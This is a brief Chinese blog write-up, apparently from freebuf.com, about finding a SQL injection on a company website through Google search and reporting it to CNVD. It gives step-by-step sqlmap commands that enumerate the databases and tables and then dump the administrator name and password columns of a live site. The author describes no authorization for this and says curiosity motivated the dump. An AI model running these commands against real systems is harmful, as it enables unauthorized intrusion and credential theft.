记某公司前台SQL注入漏洞 – 作者:dgz123456

前言

本次实战来源于谷歌搜索引擎。漏洞已经上报CNVD,文章全程打码。本人萌新一枚,大佬勿喷。

实战过程

1.打开网站的前台,此时页面是正常显示,在URL头中发现id值。
1.png
2.尝试加入单引号验证是否存在SQL注入漏洞。发现加入单引号后,页面发生了一些变化。
2.png
3.直接使用我们的SQL注入神器-SqlMap扫描一波数据库。成功扫描出来数据库。
SqlMap:
python sqlmap.py -u “http://XXXX.com/about.php?id=1”–delay 2 –batch –dbs
3.png
4.继续查看数据库XXX里面的所有表。
SqlMap:
python sqlmap.py -u “http://XXXX.com/about.php?id=1”–delay 2 –batch -D XXXX –tables
4.png
5.查看到了所有的表名,好奇心唆使我查看XXX表里的内容
5.png
6.都到这里了,必须查看里面到底有些啥。这里得到了网站管理员的ZH和MM

SqlMap:
python sqlmap.py -u “http://XXXX.com/about.php?id=1”–delay 2 –batch -D XXXX -T XXXX -C admin_name,admin_pass –dump
6.png
上报CNVD漏洞平台,溜了溜了。

来源:freebuf.com 2021-06-01 17:11:45 by: dgz123456

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论